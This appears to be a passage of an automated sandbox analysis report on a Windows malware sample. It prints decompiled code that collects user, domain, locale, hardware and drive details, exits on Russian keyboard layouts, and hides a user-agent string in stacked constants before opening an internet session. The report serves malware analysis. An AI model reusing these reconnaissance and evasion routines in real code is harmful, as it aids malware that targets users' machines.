                                    									if(_t204 == 0) {
                                    										 *(_t279 + 0x6c) = 0;
                                    									} else {
                                    										 *(_t279 + 0x6c) = _v28(0x29a,  *(_t279 + 0x68), lstrlenW( *(_t279 + 0x68)) + _t207);
                                    									}
                                    									 *(_t279 + 0x70) =  *(_t276 + 0x600);
                                    									VirtualFree(_t276, 0, 0x8000); // executed
                                    								}
                                    								if( *((intOrPtr*)(_t279 + 0x74)) == 0) {
                                    									L67:
                                    									if( *(_t279 + 0x80) == 0) {
                                    										L72:
                                    										return 1;
                                    									}
                                    									_t154 = VirtualAlloc(0, 0x81, 0x3000, 4); // executed
                                    									 *(_t279 + 0x84) = _t154;
                                    									if(_t154 == 0) {
                                    										L71:
                                    										 *(_t279 + 0x80) = 0;
                                    										goto L72;
                                    									}
                                    									_push(_t260);
                                    									_t155 = E0F586FF0(_t154); // executed
                                    									if(_t155 != 0) {
                                    										goto L72;
                                    									}
                                    									VirtualFree( *(_t279 + 0x84), _t155, 0x8000); // executed
                                    									goto L71;
                                    								} else {
                                    									_v68 = L"UNKNOWN";
                                    									_v64 = L"NO_ROOT_DIR";
                                    									_v60 = L"REMOVABLE";
                                    									_v56 = L"FIXED";
                                    									_v52 = L"REMOTE";
                                    									_v48 = L"CDROM";
                                    									_v44 = L"RAMDISK";
                                    									_t157 = VirtualAlloc(0, 0x400, 0x3000, 4); // executed
                                    									 *(_t279 + 0x7c) = _t157;
                                    									_t261 =  &_v132;
                                    									_t158 = 0x41;
                                    									do {
                                    										 *_t261 = _t158;
                                    										_t261 = _t261 + 2;
                                    										_t158 = _t158 + 1;
                                    									} while (_t158 <= 0x5a);
                                    									_t159 =  *L"?:\\"; // 0x3a003f
                                    									_v40 = _t159;
                                    									_t160 =  *0xf58f350; // 0x5c
                                    									_v36 = _t160;
                                    									_t161 = 0;
                                    									_v24 = 0;
                                    									do {
                                    										_v40 =  *((intOrPtr*)(_t280 + _t161 * 2 - 0x80));
                                    										_t164 = GetDriveTypeW( &_v40); // executed
                                    										_t270 = _t164;
                                    										if(_t270 > 2 && _t270 != 5) {
                                    											_v36 = 0;
                                    											lstrcatW( *(_t279 + 0x7c),  &_v40);
                                    											_v36 = 0x5c;
                                    											lstrcatW( *(_t279 + 0x7c),  *(_t280 + _t270 * 4 - 0x40));
                                    											lstrcatW( *(_t279 + 0x7c), "_");
                                    											_t178 = GetDiskFreeSpaceW( &_v40,  &_v28,  &_v20,  &_v12,  &_v16); // executed
                                    											if(_t178 == 0) {
                                    												lstrcatW( *(_t279 + 0x7c), L"0,");
                                    												goto L64;
                                    											}
                                    											_v8 = E0F588AB0(_v16, 0, _v28 * _v20, 0);
                                    											_t256 = _t267;
                                    											_t181 = E0F588AB0(_v12, 0, _v28 * _v20, 0);
                                    											_t274 = _v8;
                                    											_v32 = _t274 - _t181;
                                    											asm("sbb eax, edx");
                                    											_v8 = _t256;
                                    											_t183 = lstrlenW( *(_t279 + 0x7c));
                                    											_push(_t256);
                                    											wsprintfW( &(( *(_t279 + 0x7c))[_t183]), L"%I64u/", _t274);
                                    											_t186 = lstrlenW( *(_t279 + 0x7c));
                                    											_push(_v8);
                                    											wsprintfW( &(( *(_t279 + 0x7c))[_t186]), L"%I64u", _v32);
                                    											_t281 = _t281 + 0x20;
                                    											lstrcatW( *(_t279 + 0x7c), ",");
                                    										}
                                    										_t161 = _v24 + 1;
                                    										_v24 = _t161;
                                    									} while (_t161 < 0x1b);
                                    									_t166 = lstrlenW( *(_t279 + 0x7c));
                                    									_t260 =  *(_t279 + 0x7c);
                                    									 *((short*)(_t260 + _t166 * 2 - 2)) = 0;
                                    									goto L67;
                                    								}
                                    							} else {
                                    								__imp__GetNativeSystemInfo( &_v76); // executed
                                    								_t218 = VirtualAlloc(0, 0x40, 0x3000, 4); // executed
                                    								_t260 = _v76 & 0x0000ffff;
                                    								 *(_t279 + 0x5c) = _t218;
                                    								if(_t260 > 9) {
                                    									L42:
                                    									_push(L"Unknown");
                                    									L43:
                                    									wsprintfW(_t218, ??);
                                    									_t281 = _t281 + 8;
                                    									goto L44;
                                    								}
                                    								_t260 =  *(_t260 + E0F587B60) & 0x000000ff;
                                    								switch( *((intOrPtr*)(_t260 * 4 +  &M0F587B4C))) {
                                    									case 0:
                                    										_push(L"x86");
                                    										goto L43;
                                    									case 1:
                                    										_push(L"ARM");
                                    										goto L43;
                                    									case 2:
                                    										_push(L"Itanium");
                                    										goto L43;
                                    									case 3:
                                    										_push(L"x64");
                                    										goto L43;
                                    									case 4:
                                    										goto L42;
                                    								}
                                    							}
                                    						}
                                    						_t224 = VirtualAlloc(0, 0x8a, 0x3000, 4); // executed
                                    						_v8 = _t224;
                                    						_v20 = _t224 + 0xe;
                                    						_t226 = VirtualAlloc(0, 4, 0x3000, 4); // executed
                                    						 *(_t279 + 0x44) = _t226;
                                    						_t277 = 1;
                                    						_v24 = 1;
                                    						do {
                                    							wsprintfW(_v8, L"%d", _t277);
                                    							_t281 = _t281 + 0xc;
                                    							_v16 = 0;
                                    							_t277 = _t277 + 1;
                                    							_t229 = RegOpenKeyExW(0x80000001, L"Keyboard Layout\\Preload", 0, 0x20019,  &_v12); // executed
                                    							if(_t229 != 0) {
                                    								L27:
                                    								_t230 = 0;
                                    								_v24 = 0;
                                    								goto L28;
                                    							}
                                    							_v28 = 0x80;
                                    							_t234 = RegQueryValueExW(_v12, _v8, 0, 0, _v20,  &_v28); // executed
                                    							if(_t234 != 0) {
                                    								GetLastError();
                                    							} else {
                                    								_v16 = 1;
                                    							}
                                    							RegCloseKey(_v12); // executed
                                    							if(_v16 == 0) {
                                    								goto L27;
                                    							} else {
                                    								if(lstrcmpiW(_v20, L"00000419") == 0) {
                                    									_t218 = wsprintfW( *(_t279 + 0x44), "1");
                                    									_t281 = _t281 + 8;
                                    									ExitProcess(0);
                                    								}
                                    								_t230 = _v24;
                                    							}
                                    							L28:
                                    						} while (_t277 != 9 && _t230 != 0);
                                    						wsprintfW( *(_t279 + 0x44), "0");
                                    						_t281 = _t281 + 8;
                                    						VirtualFree(_v8, 0, 0x8000); // executed
                                    						goto L31;
                                    					}
                                    					_t238 = VirtualAlloc(0, 0x80, 0x3000, 4); // executed
                                    					_v20 = _t238;
                                    					 *(_t279 + 0x38) = _t238;
                                    					_v12 = 0;
                                    					_t240 = RegOpenKeyExW(0x80000001, L"Control Panel\\International", 0, 0x20019,  &_v8); // executed
                                    					if(_t240 != 0) {
                                    						L17:
                                    						 *(_t279 + 0x30) = 0;
                                    						VirtualFree( *(_t279 + 0x38), 0, 0x8000);
                                    						goto L18;
                                    					}
                                    					_v24 = 0x40;
                                    					_t243 = RegQueryValueExW(_v8, L"LocaleName", 0, 0, _v20,  &_v24); // executed
                                    					if(_t243 != 0) {
                                    						GetLastError();
                                    					} else {
                                    						_v12 = 1;
                                    					}
                                    					RegCloseKey(_v8); // executed
                                    					if(_v12 != 0) {
                                    						goto L18;
                                    					} else {
                                    						goto L17;
                                    					}
                                    				} else {
                                    					_t246 = VirtualAlloc(0, 0x80, 0x3000, 4); // executed
                                    					 *(_t279 + 0x20) = _t246;
                                    					if(_t246 == 0) {
                                    						goto L11;
                                    					}
                                    					_push(_t260);
                                    					_t247 = E0F587410(_t260, 0x80000002, L"SYSTEM\\CurrentControlSet\\services\\Tcpip\\Parameters", L"Domain", _t246, 0x80); // executed
                                    					if(_t247 == 0) {
                                    						wsprintfW( *(_t279 + 0x20), L"undefined");
                                    						L10:
                                    						_t281 = _t281 + 8;
                                    						goto L11;
                                    					}
                                    					_t249 =  *(_t279 + 0x20);
                                    					if( *_t249 != 0) {
                                    						goto L11;
                                    					}
                                    					wsprintfW(_t249, L"WORKGROUP");
                                    					goto L10;
                                    				}
                                    			}




































































                                    0x0f587490
                                    0x0f587490
                                    0x0f58749b
                                    0x0f5874a7
                                    0x0f5874b7
                                    0x0f5874b9
                                    0x0f5874bc
                                    0x0f5874c1
                                    0x0f5874c8
                                    0x0f5874c8
                                    0x0f5874d2
                                    0x0f5874df
                                    0x0f5874e6
                                    0x0f5874e8
                                    0x0f5874eb
                                    0x0f5874f0
                                    0x0f5874f0
                                    0x0f587500
                                    0x0f587556
                                    0x0f58755a
                                    0x0f5875f5
                                    0x0f5875f9
                                    0x0f5876f9
                                    0x0f5876fd
                                    0x0f58770d
                                    0x0f58770f
                                    0x0f587725
                                    0x0f587728
                                    0x0f58772f
                                    0x0f587731
                                    0x0f587749
                                    0x0f587756
                                    0x0f587758
                                    0x0f587758
                                    0x0f58772f
                                    0x0f58775f
                                    0x0f5877ce
                                    0x0f5877d2
                                    0x0f5877d7
                                    0x0f5877e3
                                    0x0f5877ea
                                    0x0f5877ec
                                    0x0f5877ec
                                    0x0f5877ea
                                    0x0f5877f3
                                    0x0f587807
                                    0x0f587817
                                    0x0f58781a
                                    0x0f58781c
                                    0x0f587824
                                    0x0f58782c
                                    0x0f58782c
                                    0x0f587837
                                    0x0f58783b
                                    0x0f587842
                                    0x0f587849
                                    0x0f587856
                                    0x0f58785e
                                    0x0f587864
                                    0x0f58786a
                                    0x0f58786a
                                    0x0f587880
                                    0x0f587887
                                    0x0f587889
                                    0x0f587890
                                    0x0f587896
                                    0x0f587896
                                    0x0f58789c
                                    0x0f5878b5
                                    0x0f5878b5
                                    0x0f5878c8
                                    0x0f5878d0
                                    0x0f5878d6
                                    0x0f5878dd
                                    0x0f5878f0
                                    0x0f5878f6
                                    0x0f5878fb
                                    0x0f587919
                                    0x0f5878fd
                                    0x0f587914
                                    0x0f587914
                                    0x0f58792e
                                    0x0f587931
                                    0x0f587931
                                    0x0f587943
                                    0x0f587af2
                                    0x0f587af9
                                    0x0f587b42
                                    0x0f587b4b
                                    0x0f587b4b
                                    0x0f587b09
                                    0x0f587b0f
                                    0x0f587b17
                                    0x0f587b36
                                    0x0f587b36
                                    0x00000000
                                    0x0f587b36
                                    0x0f587b19
                                    0x0f587b1b
                                    0x0f587b22
                                    0x00000000
                                    0x00000000
                                    0x0f587b30
                                    0x00000000
                                    0x0f587949
                                    0x0f587957
                                    0x0f58795e
                                    0x0f587965
                                    0x0f58796c
                                    0x0f587973
                                    0x0f58797a
                                    0x0f587981
                                    0x0f587988
                                    0x0f58798e
                                    0x0f587991
                                    0x0f587994
                                    0x0f5879a0
                                    0x0f5879a0
                                    0x0f5879a3
                                    0x0f5879a6
                                    0x0f5879a7
                                    0x0f5879ad
                                    0x0f5879b2
                                    0x0f5879b5
                                    0x0f5879ba
                                    0x0f5879bd
                                    0x0f5879bf
                                    0x0f5879c2
                                    0x0f5879c7
                                    0x0f5879cf
                                    0x0f5879d5
                                    0x0f5879da
                                    0x0f5879eb
                                    0x0f5879f6
                                    0x0f587a04
                                    0x0f587a08
                                    0x0f587a12
                                    0x0f587a28
                                    0x0f587a30
                                    0x0f587acb
                                    0x00000000
                                    0x0f587acb
                                    0x0f587a52
                                    0x0f587a55
                                    0x0f587a57
                                    0x0f587a5c
                                    0x0f587a68
                                    0x0f587a6b
                                    0x0f587a6d
                                    0x0f587a70
                                    0x0f587a79
                                    0x0f587a8a
                                    0x0f587a98
                                    0x0f587a9a
                                    0x0f587aac
                                    0x0f587ab4
                                    0x0f587abf
                                    0x0f587abf
                                    0x0f587ad6
                                    0x0f587ad7
                                    0x0f587ada
                                    0x0f587ae6
                                    0x0f587ae8
                                    0x0f587aed
                                    0x00000000
                                    0x0f587aed
                                    0x0f587761
                                    0x0f587765
                                    0x0f587776
                                    0x0f587778
                                    0x0f58777c
                                    0x0f587782
                                    0x0f5877c3
                                    0x0f5877c3
                                    0x0f5877c8
                                    0x0f5877c9
                                    0x0f5877cb
                                    0x00000000
                                    0x0f5877cb
                                    0x0f587784
                                    0x0f58778b
                                    0x00000000
                                    0x0f5877bc
                                    0x00000000
                                    0x00000000
                                    0x0f5877ae
                                    0x00000000
                                    0x00000000
                                    0x0f5877b5
                                    0x00000000
                                    0x00000000
                                    0x0f5877a7
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x0f58778b
                                    0x0f58775f
                                    0x0f58760d
                                    0x0f587616
                                    0x0f587620
                                    0x0f587623
                                    0x0f587625
                                    0x0f587628
                                    0x0f58762d
                                    0x0f587634
                                    0x0f58763d
                                    0x0f58763f
                                    0x0f587642
                                    0x0f58764c
                                    0x0f58765f
                                    0x0f587667
                                    0x0f5876c4
                                    0x0f5876c4
                                    0x0f5876c6
                                    0x00000000
                                    0x0f5876c6
                                    0x0f58766c
                                    0x0f587681
                                    0x0f587689
                                    0x0f587694
                                    0x0f58768b
                                    0x0f58768b
                                    0x0f58768b
                                    0x0f58769d
                                    0x0f5876a7
                                    0x00000000
                                    0x0f5876a9
                                    0x0f5876b9
                                    0x0f58779a
                                    0x0f58779c
                                    0x0f5877a1
                                    0x0f5877a1
                                    0x0f5876bf
                                    0x0f5876bf
                                    0x0f5876c9
                                    0x0f5876c9
                                    0x0f5876de
                                    0x0f5876e0
                                    0x0f5876ed
                                    0x00000000
                                    0x0f5876f3
                                    0x0f58756e
                                    0x0f587570
                                    0x0f587573
                                    0x0f58758b
                                    0x0f587592
                                    0x0f58759a
                                    0x0f5875de
                                    0x0f5875e8
                                    0x0f5875ef
                                    0x00000000
                                    0x0f5875ef
                                    0x0f58759f
                                    0x0f5875b6
                                    0x0f5875be
                                    0x0f5875c9
                                    0x0f5875c0
                                    0x0f5875c0
                                    0x0f5875c0
                                    0x0f5875d2
                                    0x0f5875dc
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x0f587502
                                    0x0f587510
                                    0x0f587512
                                    0x0f587517
                                    0x00000000
                                    0x00000000
                                    0x0f587519
                                    0x0f58752f
                                    0x0f587536
                                    0x0f587551
                                    0x0f587551
                                    0x0f587553
                                    0x00000000
                                    0x0f587553
                                    0x0f587538
                                    0x0f58753f
                                    0x00000000
                                    0x00000000
                                    0x0f587551
                                    0x00000000
                                    0x0f587551

                                    APIs
                                    • VirtualAlloc.KERNELBASE(00000000,00000202,00003000,00000004), ref: 0F5874B7
                                    • GetUserNameW.ADVAPI32(00000000,?), ref: 0F5874C8
                                    • VirtualAlloc.KERNELBASE(00000000,00000020,00003000,00000004), ref: 0F5874E6
                                    • GetComputerNameW.KERNEL32 ref: 0F5874F0
                                    • VirtualAlloc.KERNELBASE(00000000,00000080,00003000,00000004), ref: 0F587510
                                    • wsprintfW.USER32 ref: 0F587551
                                    • VirtualAlloc.KERNELBASE(00000000,00000080,00003000,00000004), ref: 0F58756E
                                    • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\International,00000000,00020019,00000000), ref: 0F587592
                                    • RegQueryValueExW.KERNELBASE(00000000,LocaleName,00000000,00000000,0F584810,?), ref: 0F5875B6
                                    • GetLastError.KERNEL32 ref: 0F5875C9
                                    • RegCloseKey.KERNELBASE(00000000), ref: 0F5875D2
                                    • VirtualFree.KERNEL32(?,00000000,00008000), ref: 0F5875EF
                                    • VirtualAlloc.KERNELBASE(00000000,0000008A,00003000,00000004), ref: 0F58760D
                                    • VirtualAlloc.KERNELBASE(00000000,00000004,00003000,00000004), ref: 0F587623
                                    • wsprintfW.USER32 ref: 0F58763D
                                    • RegOpenKeyExW.KERNELBASE(80000001,Keyboard Layout\Preload,00000000,00020019,?), ref: 0F58765F
                                    • RegQueryValueExW.KERNELBASE(?,00000000,00000000,00000000,0F584810,?), ref: 0F587681
                                    • GetLastError.KERNEL32 ref: 0F587694
                                    • RegCloseKey.KERNELBASE(?), ref: 0F58769D
                                    • lstrcmpiW.KERNEL32(0F584810,00000419), ref: 0F5876B1
                                    • wsprintfW.USER32 ref: 0F5876DE
                                    • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0F5876ED
                                    • VirtualAlloc.KERNELBASE(00000000,00000082,00003000,00000004), ref: 0F58770D
                                    • wsprintfW.USER32 ref: 0F587756
                                    • GetNativeSystemInfo.KERNELBASE(?), ref: 0F587765
                                    • VirtualAlloc.KERNELBASE(00000000,00000040,00003000,00000004), ref: 0F587776
                                    • wsprintfW.USER32 ref: 0F58779A
                                    • ExitProcess.KERNEL32 ref: 0F5877A1
                                    • wsprintfW.USER32 ref: 0F5877C9
                                    • VirtualAlloc.KERNELBASE(00000000,00000400,00003000,00000004), ref: 0F587807
                                    • VirtualAlloc.KERNELBASE(00000000,00000E0C,00003000,00000004), ref: 0F58781A
                                    • GetWindowsDirectoryW.KERNEL32(00000000,00000100), ref: 0F587824
                                    • GetVolumeInformationW.KERNELBASE(00000000,00000200,00000100,00000600,00000608,00000604,00000400,00000100), ref: 0F58785E
                                    • lstrlenW.KERNEL32(0000060C,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,ProcessorNameString,0000060C,00000080), ref: 0F587890
                                    • wsprintfW.USER32 ref: 0F5878C8
                                    • lstrcatW.KERNEL32(?,0000060C), ref: 0F5878DD
                                    • GetModuleHandleW.KERNEL32(ntdll.dll,RtlComputeCrc32), ref: 0F5878E9
                                    • GetProcAddress.KERNEL32(00000000), ref: 0F5878F0
                                    • lstrlenW.KERNEL32(?), ref: 0F587900
                                    • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0F587931
                                      • Part of subcall function 0F587B70: VirtualAlloc.KERNELBASE(00000000,00000400,00003000,00000004,772966A0,?,76F0C0B0), ref: 0F587B8D
                                      • Part of subcall function 0F587B70: VirtualAlloc.KERNELBASE(00000000,00000004,00003000,00000004), ref: 0F587C01
                                      • Part of subcall function 0F587B70: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0F587C16
                                      • Part of subcall function 0F587B70: VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F587C2C
                                    • VirtualAlloc.KERNELBASE(00000000,00000400,00003000,00000004), ref: 0F587988
                                    • GetDriveTypeW.KERNELBASE(?), ref: 0F5879CF
                                    • lstrcatW.KERNEL32(?,?), ref: 0F5879F6
                                    • lstrcatW.KERNEL32(?,0F59030C), ref: 0F587A08
                                    • lstrcatW.KERNEL32(?,0F590380), ref: 0F587A12
                                    • GetDiskFreeSpaceW.KERNELBASE(?,?,0F584810,?,00000000), ref: 0F587A28
                                    • lstrlenW.KERNEL32(?,?,00000000,0F584810,00000000,00000000,00000000,0F584810,00000000), ref: 0F587A70
                                    • wsprintfW.USER32 ref: 0F587A8A
                                    • lstrlenW.KERNEL32(?), ref: 0F587A98
                                    • wsprintfW.USER32 ref: 0F587AAC
                                    • lstrcatW.KERNEL32(?,0F5903A0), ref: 0F587ABF
                                    • lstrcatW.KERNEL32(?,0F5903A4), ref: 0F587ACB
                                    • lstrlenW.KERNEL32(?), ref: 0F587AE6
                                    • VirtualAlloc.KERNELBASE(00000000,00000081,00003000,00000004), ref: 0F587B09
                                    • VirtualFree.KERNELBASE(?,00000000,00008000,00000000), ref: 0F587B30
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.327997550.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true
                                    • Associated: 0000000B.00000002.327992363.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 0000000B.00000002.328006726.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 0000000B.00000002.328015412.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 0000000B.00000002.328020862.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_f580000_mqsmvj.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Virtual$Alloc$wsprintf$Freelstrcat$lstrlen$CloseErrorLastNameOpenQueryValue$AddressComputerCreateDirectoryDiskDriveExitHandleInfoInformationModuleNativeProcProcessSnapshotSpaceSystemToolhelp32TypeUserVolumeWindowslstrcmpi
                                    • String ID: i)w$%I64u$%I64u/$00000419$?:\$@$ARM$Control Panel\International$Domain$HARDWARE\DESCRIPTION\System\CentralProcessor\0$Identifier$Itanium$Keyboard Layout\Preload$LocaleName$ProcessorNameString$RtlComputeCrc32$SOFTWARE\Microsoft\Windows NT\CurrentVersion$SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion$SYSTEM\CurrentControlSet\services\Tcpip\Parameters$Unknown$WORKGROUP$error$ntdll.dll$productName$undefined$x64$x86
                                    • API String ID: 153366582-3138453034
                                    • Opcode ID: db598fd2247acd5e6e387bbb91f9700466951a2b3789d0d5468cdaf3fc115aab
                                    • Instruction ID: f5e740bde8b69a31add8ab3e31f9ba906fc42162dc3dd32bb0a4b36d1f2c38c9
                                    • Opcode Fuzzy Hash: db598fd2247acd5e6e387bbb91f9700466951a2b3789d0d5468cdaf3fc115aab
                                    • Instruction Fuzzy Hash: 2C12C170640305FBEB24AFA4DD45FAABBB4FF08701F200929F641B62D1D7B4A516DB54
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 169 f587e40-f58802b InternetOpenW 170 f58802d-f58803f InternetOpenW 169->170 171 f588042-f588048 169->171 170->171
                                    C-Code - Quality: 100%
                                    			E0F587E40(void* __ecx) {
                                    				short _v8;
                                    				intOrPtr _v12;
                                    				intOrPtr _v16;
                                    				intOrPtr _v20;
                                    				intOrPtr _v24;
                                    				intOrPtr _v28;
                                    				intOrPtr _v32;
                                    				intOrPtr _v36;
                                    				intOrPtr _v40;
                                    				intOrPtr _v44;
                                    				intOrPtr _v48;
                                    				intOrPtr _v52;
                                    				intOrPtr _v56;
                                    				intOrPtr _v60;
                                    				intOrPtr _v64;
                                    				intOrPtr _v68;
                                    				intOrPtr _v72;
                                    				intOrPtr _v76;
                                    				intOrPtr _v80;
                                    				intOrPtr _v84;
                                    				intOrPtr _v88;
                                    				intOrPtr _v92;
                                    				intOrPtr _v96;
                                    				intOrPtr _v100;
                                    				intOrPtr _v104;
                                    				intOrPtr _v108;
                                    				intOrPtr _v112;
                                    				intOrPtr _v116;
                                    				intOrPtr _v120;
                                    				intOrPtr _v124;
                                    				intOrPtr _v128;
                                    				intOrPtr _v132;
                                    				intOrPtr _v136;
                                    				intOrPtr _v140;
                                    				intOrPtr _v144;
                                    				intOrPtr _v148;
                                    				intOrPtr _v152;
                                    				intOrPtr _v156;
                                    				intOrPtr _v160;
                                    				intOrPtr _v164;
                                    				intOrPtr _v168;
                                    				intOrPtr _v172;
                                    				intOrPtr _v176;
                                    				intOrPtr _v180;
                                    				intOrPtr _v184;
                                    				intOrPtr _v188;
                                    				intOrPtr _v192;
                                    				intOrPtr _v196;
                                    				intOrPtr _v200;
                                    				intOrPtr _v204;
                                    				intOrPtr _v208;
                                    				intOrPtr _v212;
                                    				intOrPtr _v216;
                                    				intOrPtr _v220;
                                    				short _v224;
                                    				WCHAR* _t62;
                                    				void* _t64;
                                    
                                    				_v8 = 0;
                                    				_v224 = 0x6f004d;
                                    				_v220 = 0x69007a;
                                    				_v216 = 0x6c006c;
                                    				_v212 = 0x2f0061;
                                    				_v208 = 0x2e0035;
                                    				_v204 = 0x200030;
                                    				_v200 = 0x570028;
                                    				_v196 = 0x6e0069;
                                    				_v192 = 0x6f0064;
                                    				_v188 = 0x730077;
                                    				_v184 = 0x4e0020;
                                    				_v180 = 0x200054;
                                    				_v176 = 0x2e0036;
                                    				_v172 = 0x3b0031;
                                    				_v168 = 0x570020;
                                    				_v164 = 0x57004f;
                                    				_v160 = 0x340036;
                                    				_v156 = 0x200029;
                                    				_v152 = 0x700041;
                                    				_v148 = 0x6c0070;
                                    				_v144 = 0x570065;
                                    				_v140 = 0x620065;
                                    				_v136 = 0x69004b;
                                    				_v132 = 0x2f0074;
                                    				_v128 = 0x330035;
                                    				_v124 = 0x2e0037;
                                    				_v120 = 0x360033;
                                    				_v116 = 0x280020;
                                    				_v112 = 0x48004b;
                                    				_v108 = 0x4d0054;
                                    				_v104 = 0x2c004c;
                                    				_v100 = 0x6c0020;
                                    				_v96 = 0x6b0069;
                                    				_v92 = 0x200065;
                                    				_v88 = 0x650047;
                                    				_v84 = 0x6b0063;
                                    				_v80 = 0x29006f;
                                    				_v76 = 0x430020;
                                    				_v72 = 0x720068;
                                    				_v68 = 0x6d006f;
                                    				_v64 = 0x2f0065;
                                    				_v60 = 0x350035;
                                    				_v56 = 0x30002e;
                                    				_v52 = 0x32002e;
                                    				_v48 = 0x380038;
                                    				_v44 = 0x2e0033;
                                    				_v40 = 0x370038;
                                    				_v36 = 0x530020;
                                    				_v32 = 0x660061;
                                    				_v28 = 0x720061;
                                    				_v24 = 0x2f0069;
                                    				_v20 = 0x330035;
                                    				_v16 = 0x2e0037;
                                    				_v12 = 0x360033;
                                    				_t62 = InternetOpenW( &_v224, 0, 0, 0, 0); // executed
                                    				 *(__ecx + 4) = _t62;
                                    				if(_t62 == 0) {
                                    					_t64 = InternetOpenW( &_v224, 1, _t62, _t62, 0x10000000);
                                    					 *(__ecx + 4) = _t64;
                                    					return _t64;
                                    				}
                                    				return _t62;
                                    			}




























































                                    0x0f587e58
                                    0x0f587e64
                                    0x0f587e6f
                                    0x0f587e79
                                    0x0f587e83
                                    0x0f587e8d
                                    0x0f587e97
                                    0x0f587ea1
                                    0x0f587eab
                                    0x0f587eb5
                                    0x0f587ebf
                                    0x0f587ec9
                                    0x0f587ed3
                                    0x0f587edd
                                    0x0f587ee7
                                    0x0f587ef1
                                    0x0f587efb
                                    0x0f587f05
                                    0x0f587f0f
                                    0x0f587f19
                                    0x0f587f23
                                    0x0f587f2d
                                    0x0f587f37
                                    0x0f587f41
                                    0x0f587f4b
                                    0x0f587f52
                                    0x0f587f59
                                    0x0f587f60
                                    0x0f587f67
                                    0x0f587f6e
                                    0x0f587f75
                                    0x0f587f7c
                                    0x0f587f83
                                    0x0f587f8a
                                    0x0f587f91
                                    0x0f587f98
                                    0x0f587f9f
                                    0x0f587fa6
                                    0x0f587fad
                                    0x0f587fb4
                                    0x0f587fbb
                                    0x0f587fc2
                                    0x0f587fc9
                                    0x0f587fd0
                                    0x0f587fd7
                                    0x0f587fde
                                    0x0f587fe5
                                    0x0f587fec
                                    0x0f587ff3
                                    0x0f587ffa
                                    0x0f588001
                                    0x0f588008
                                    0x0f58800f
                                    0x0f588016
                                    0x0f58801d
                                    0x0f588024
                                    0x0f588026
                                    0x0f58802b
                                    0x0f58803d
                                    0x0f58803f
                                    0x00000000
                                    0x0f58803f
                                    0x0f588048

                                    APIs
                                    • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0F588024
                                    • InternetOpenW.WININET(006F004D,00000001,00000000,00000000,10000000), ref: 0F58803D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.327997550.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true
                                    • Associated: 0000000B.00000002.327992363.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 0000000B.00000002.328006726.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 0000000B.00000002.328015412.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 0000000B.00000002.328020862.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_f580000_mqsmvj.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: InternetOpen
                                    • String ID: $ $ $ $ $ $($)$.$.$0$1$3$3$3$5$5$5$5$6$6$7$7$8$8$A$G$K$K$L$M$O$T$T$a$a$a$c$d$e$e$e$e$h$i$i$i$l$o$o$p$t$w$z
                                    • API String ID: 2038078732-2805935662
                                    • Opcode ID: 43eda7eb153750cf251a9508cb1ede0c79da4b0e82fd346071d385916bd76b98
                                    • Instruction ID: 5672efb346f68e9b87db7bb9083adcb45b8cdd0991eab0da747c6c53c0f5ba0e
                                    • Opcode Fuzzy Hash: 43eda7eb153750cf251a9508cb1ede0c79da4b0e82fd346071d385916bd76b98
                                    • Instruction Fuzzy Hash: 2B4197B4811358DEEB258F91999879EBFF5BB04748F50819ED5087B201C7F60A89CF64
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 172 f5870a0-f5870b8 173 f5870ba-f5870da lstrcatW * 4 172->173 174 f5870dc-f5870df 172->174 173->174 175 f5870fd-f587101 174->175 176 f5870e1-f5870fb lstrcatW * 4 174->176 177 f58711f-f587123 175->177 178 f587103-f58711d lstrcatW * 4 175->178 176->175 179 f587141-f587145 177->179 180 f587125-f58713f lstrcatW * 4 177->180 178->177 181 f587163-f587167 179->181 182 f587147-f587161 lstrcatW * 4 179->182 180->179 183 f587169-f587183 lstrcatW * 4 181->183 184 f587185-f587189 181->184 182->181 183->184 185 f58718b-f5871a5 lstrcatW * 4 184->185 186 f5871a7-f5871ab 184->186 185->186 187 f5871c9-f5871cd 186->187 188 f5871ad-f5871c7 lstrcatW * 4 186->188 189 f5871eb-f5871ef 187->189 190 f5871cf-f5871e9 lstrcatW * 4 187->190 188->187 191 f58725c-f587260 189->191 192 f5871f1-f58720a VirtualAlloc 189->192 190->189 195 f58727e-f587292 lstrlenW 191->195 196 f587262-f58727c lstrcatW * 4 191->196 193 f58720c-f58721f wsprintfW 192->193 194 f587221-f58722d wsprintfW 192->194 197 f587230-f587256 lstrcatW * 4 VirtualFree 193->197 194->197 196->195 197->191
                                    C-Code - Quality: 100%
                                    			E0F5870A0(intOrPtr* __ecx, WCHAR* _a4) {
                                    				WCHAR* _t47;
                                    				intOrPtr* _t91;
                                    				intOrPtr _t94;
                                    				WCHAR* _t96;
                                    
                                    				_t91 = __ecx;
